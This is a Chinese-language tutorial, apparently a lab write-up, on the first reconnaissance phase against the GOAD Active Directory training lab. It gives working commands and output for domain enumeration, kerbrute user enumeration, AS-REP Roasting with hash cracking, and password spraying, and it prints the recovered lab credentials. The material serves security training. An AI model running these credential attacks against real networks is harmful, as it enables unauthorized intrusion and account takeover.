GOAD 域渗透教程 1：内网扫描、域控识别与初始域用户获取

这篇文章从 0 开始，带你在 GOAD 环境里完成第一轮信息收集：内网扫描、识别域控、配置 hosts、匿名枚举域用户，并继续尝试 AS-REP Roasting 和密码喷洒，拿到第一批可用凭据。

这篇文章会学到什么

• 如何用 NetExec 和 Nmap 对 GOAD 内网做第一轮信息收集
• 如何根据 SMB Signing、LDAP 与命名信息识别域控和域结构
• 如何通过匿名枚举、OSINT、AS-REP Roasting 与密码喷洒拿到初始域用户
• 如何把扫描结果整理成后续域渗透可复用的目标清单

扫描和侦查

网络扫描

NetExec 简单探测

在域渗透中，我们可以通过NetExec进行简单的域内Windows扫描

nxc smb 192.168.56.0/24

我们可知当前有三个域

essos.local
sevenkingdoms.local
north.sevenkingdoms.local

看到 signing: True 后，可以先推测这三台机器大概率是域控，再用 LDAP 进一步验证。

nxc ldap 192.168.56.0/24

可以确定有三台域控。

配置 HOSTS

我们需要在本地机器上设置hosts文件，以便后续使用Kerberos协议

# /etc/hosts
# GOAD
192.168.56.10   sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11   winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12   essos.local meereen.essos.local meereen
192.168.56.22   castelblack.north.sevenkingdoms.local castelblack
192.168.56.23   braavos.essos.local braavos

Nmap 全端口扫描

为了扩充攻击面，我们将对目前已知的机器进行全端口扫描

nmap -Pn -p- -sC -sV -oA full_scan 192.168.56.10-12,22-23

参数含义如下：

• -Pn：不使用 ping 探活。
• -p-：扫描全部端口。
• -sC：运行默认侦察脚本。
• -sV：探测服务版本。
• -oA：同时输出三种格式的结果到 full_scan。

扫描结果太长，这里就不整段贴出了。

分析扫描结果

把 sevenkingdoms.local 和 essos.local 丢进 Google 搜一下，基本就能判断这套命名和《权力的游戏》/《冰与火之歌》有关。虽然这里是靶场，但这种 OSINT 思路在实战里同样有价值。

寻找域用户

在域控上匿名枚举域账号

nxc smb 192.168.56.0/24 --users

我们在WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL中枚举到了十个域账号，并且意外收获了一个密码

samwell.tarly:Heartsbane

这些账号我们也可以验证我们在上一步的OSINT，我们寻找的是正确的信息。

有密码时我们可以使用ldapdomaindump来获取域信息。

┌──(kali㉿kali)-[~]
└─$ ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

我们获得了NORTH.SEVENKINGDOMS.LOCAL上所有的账户

OSINT + 暴力枚举账号

我们可以利用上面分析扫描结果时得到的 OSINT 信息去猜测账号名，再按另一个域里已经出现过的命名格式进行枚举。（这种格式在很多域环境里都比较通用。）

可以先写一个简单的 shell 脚本，从网页里抓取相关角色名：

#!/bin/bash

# Fetch webpage and extract character names
curl -s "https://www.hbomax.com/shows/game-of-thrones/4f6b4985-2dc9-4ab6-ac79-d60f0860b0ac/cast-and-crew" | \
grep -o '>[A-Z][a-z]* [A-Z][a-z]*<' | \
sed 's/>//g; s/<//g' | \
awk '
BEGIN { count = 0 }
{
    count++
    if (count > 11 && (count - 12) % 2 == 0) {
        # Convert to lowercase and replace spaces with dots
        name = tolower($0)
        gsub(/ /, ".", name)
        print name
    }
}' | \
sort | uniq

然后用 kerbrute 做用户名枚举：

┌──(kali㉿kali)-[~]
└─$ kerbrute userenum -d essos.local --dc 192.168.56.12 got_users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:32:31 >  Using KDC(s):
2025/12/21 06:32:31 >  	192.168.56.12:88

2025/12/21 06:32:31 >  [+] VALID USERNAME:	 daenerys.targaryen@essos.local
2025/12/21 06:32:31 >  [+] VALID USERNAME:	 jorah.mormont@essos.local
2025/12/21 06:32:31 >  [+] VALID USERNAME:	 khal.drogo@essos.local
2025/12/21 06:32:31 >  [+] VALID USERNAME:	 viserys.targaryen@essos.local
2025/12/21 06:32:36 >  Done! Tested 80 usernames (4 valid) in 5.003 seconds

也可以直接用 Nmap 的 krb5-enum-users 脚本来枚举用户名，这里换到另一个域试一下：

┌──(kali㉿kali)-[~]
└─$ nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 06:32 EST
Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00035s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     robert.baratheon@sevenkingdoms.local
|_    stannis.baratheon@sevenkingdoms.local
MAC Address: 00:0C:29:CC:C8:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

寻找未授权的SMB

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.0/24 -u 'a' -p '' --shares
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.12   445    MEEREEN          [-] essos.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.22   445    CASTELBLACK      [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.23   445    BRAAVOS          [+] essos.local\a: (Guest)
SMB         192.168.56.23   445    BRAAVOS          [*] Enumerated shares
SMB         192.168.56.23   445    BRAAVOS          Share           Permissions     Remark
SMB         192.168.56.23   445    BRAAVOS          -----           -----------     ------
SMB         192.168.56.23   445    BRAAVOS          ADMIN$                          Remote Admin
SMB         192.168.56.23   445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         192.168.56.23   445    BRAAVOS          C$                              Default share
SMB         192.168.56.23   445    BRAAVOS          CertEnroll                      Active Directory Certificate Services share
SMB         192.168.56.23   445    BRAAVOS          IPC$            READ            Remote IPC
SMB         192.168.56.23   445    BRAAVOS          public                          Basic Read share for all domain users
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

可以看到 all 这个共享对 Guest 开放了读写权限，这类未授权共享在实战里很值得优先翻。

有用户名但是没有密码的情况

AS-REP Roasting

例如，我们已经通过 ldapdomaindump 拿到了 north.sevenkingdoms.local 上的一批用户名。

sql_svc
jeor.mormont
samwell.tarly
jon.snow
hodor
rickon.stark
brandon.stark
sansa.stark
robb.stark
catelyn.stark
eddard.stark
arya.stark
krbtgt
vagrant
Guest
Administrator

把这些用户名保存到 users.txt 之后，继续枚举：

┌──(kali㉿kali)-[~]
└─$ impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:c0d425fe45c54c3c18e875898bca120f$45ac4cb030568708dae3e1c6c2dc5777628b03f8c2a0c33cde1affe1005f3877c51d8c71a551bc2cec9d65b66ca4ee3dfac29d86e5adf504a3e1e627624951d1783896c0171c86530661894964b1faac172a3ba01fc851b43d54bfdec323e1502a9435f97a98c71c3a5794faeb1898393f448a387bef9483880de57fb38e9a3a16ff3709f6c01f5d51389a7e867d520ae37f30b1c5968abeeab45d0046d2e55f2235a94051938f261fb0fb4e91186c7588e0bb935b4dee180f0d66ac7d3c0cee54c0f78842495c662376e32815da9ca43d5a064d6af83336925e5634bd10f7cc60d4d9d7f9b3f4367b813d83dcf4f3e86dc18fd7ce2486aeaeca61b9c5d547ccb498d6bfa114
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

这样就拿到了 brandon.stark 的 AS-REP 哈希，接着用 hashcat 离线破解。

┌──(kali㉿kali)-[~]
└─$ hashcat -m 18200 asrephash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900H, 6956/13913 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 513 MB (11083 MB free)

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:c0d425fe45c54c3c18e875898bca120f$45ac4cb030568708dae3e1c6c2dc5777628b03f8c2a0c33cde1affe1005f3877c51d8c71a551bc2cec9d65b66ca4ee3dfac29d86e5adf504a3e1e627624951d1783896c0171c86530661894964b1faac172a3ba01fc851b43d54bfdec323e1502a9435f97a98c71c3a5794faeb1898393f448a387bef9483880de57fb38e9a3a16ff3709f6c01f5d51389a7e867d520ae37f30b1c5968abeeab45d0046d2e55f2235a94051938f261fb0fb4e91186c7588e0bb935b4dee180f0d66ac7d3c0cee54c0f78842495c662376e32815da9ca43d5a064d6af83336925e5634bd10f7cc60d4d9d7f9b3f4367b813d83dcf4f3e86dc18fd7ce2486aeaeca61b9c5d547ccb498d6bfa114:iseedeadpeople

这样就拿到了 brandon.stark 的密码：iseedeadpeople。

密码喷洒

第一种情况是用户名和密码相同（现实里相对少见）。

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\hodor:hodor

第二种情况是弱口令复用，这时可以用 Kerbrute 做快速喷洒。

┌──(kali㉿kali)-[~]
└─$ kerbrute passwordspray -d north.sevenkingdoms.local --dc 192.168.56.11 users.txt hodor

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:56:44 >  Using KDC(s):
2025/12/21 06:56:44 >  	192.168.56.11:88

2025/12/21 06:56:44 >  [+] VALID LOGIN:	 hodor@north.sevenkingdoms.local:hodor
2025/12/21 06:56:44 >  Done! Tested 16 logins (1 successes) in 0.019 seconds

总结

这次旅程里，我们总共拿到了 3 组有效凭据：

• samwell.tarly:Heartsbane（用户描述泄露）
• brandon.stark:iseedeadpeople（AS-REP Roasting）
• hodor:hodor（密码喷洒）

本文参考了 Mayfly 师傅的很多思路，感兴趣的话可以去看原文。